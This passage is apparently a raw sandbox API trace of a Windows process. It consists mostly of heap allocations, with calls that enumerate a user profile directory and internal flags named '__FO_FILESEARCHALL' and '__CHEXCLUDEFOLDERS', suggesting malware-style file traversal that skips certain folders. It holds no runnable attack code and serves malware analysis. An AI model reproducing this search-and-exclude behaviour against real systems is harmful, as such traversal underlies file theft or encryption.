(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0157.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b40 | out: hHeap=0x8a0000) returned 1 [0157.066] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad58 | out: hHeap=0x8a0000) returned 1 [0157.066] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b40 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0157.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="*", cchCount1=1, lpString2="*", cchCount2=1) returned 2 [0157.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0157.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0157.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b40 | out: hHeap=0x8a0000) returned 1 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad58 [0157.067] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b40 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.067] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b40 | out: hHeap=0x8a0000) returned 1 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b40 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0157.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0157.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b80 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b90 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f88 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f10 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ba0 [0157.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f10 | out: hHeap=0x8a0000) returned 1 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f10 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1bb0 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f28 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f40 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ec8 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1bc0 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ee0 [0157.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1bd0 [0157.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ee0 | out: hHeap=0x8a0000) returned 1 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ee0 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1be0 [0157.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ee0 | out: hHeap=0x8a0000) returned 1 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1bf0 [0157.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1bf0 | out: hHeap=0x8a0000) returned 1 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ee0 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1bf0 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ef8 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2a0 [0157.069] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e80 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c00 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e98 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9eb0 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c10 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e50 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e68 [0157.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e68 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c30 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9df0 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c40 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e08 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c50 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0157.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e08 | out: hHeap=0x8a0000) returned 1 [0157.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c30 | out: hHeap=0x8a0000) returned 1 [0157.070] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x87eae0 | out: lpFindFileData=0x87eae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e7858, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ad98 [0157.070] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eae0 | out: lpFindFileData=0x87eae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e7858, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.070] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eae0 | out: lpFindFileData=0x87eae0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e7858, dwReserved1=0x8a7560, cFileName="AppData", cAlternateFileName="")) returned 1 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e08 [0157.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c30 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c50 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.071] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c50 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c40 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c50 | out: hHeap=0x8a0000) returned 1 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.071] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90add8 [0157.071] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e68 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c50 [0157.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c50 | out: hHeap=0x8a0000) returned 1 [0157.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9df0 [0157.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c50 [0157.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e20 [0157.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.072] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c40 [0157.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.072] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c40 [0157.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0157.073] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c20 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c40 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c60 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1c70 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1c80 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.073] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1c80 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9df0 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1c90 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e68 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9da8 [0157.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dc0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ca0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dd8 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0157.074] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9dd8 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b08 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cd0 [0157.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cd0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ce0 [0157.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ce0 | out: hHeap=0x8a0000) returned 1 [0157.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0157.074] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cd0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d18 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ce0 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0157.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cf0 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cf0 | out: hHeap=0x8a0000) returned 1 [0157.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d78 [0157.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AppData", cchCount1=7, lpString2="AppData", cchCount2=7) returned 2 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d18 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d78 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ce0 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0157.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9d78 [0157.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9d18 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d78 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d18 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d30 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 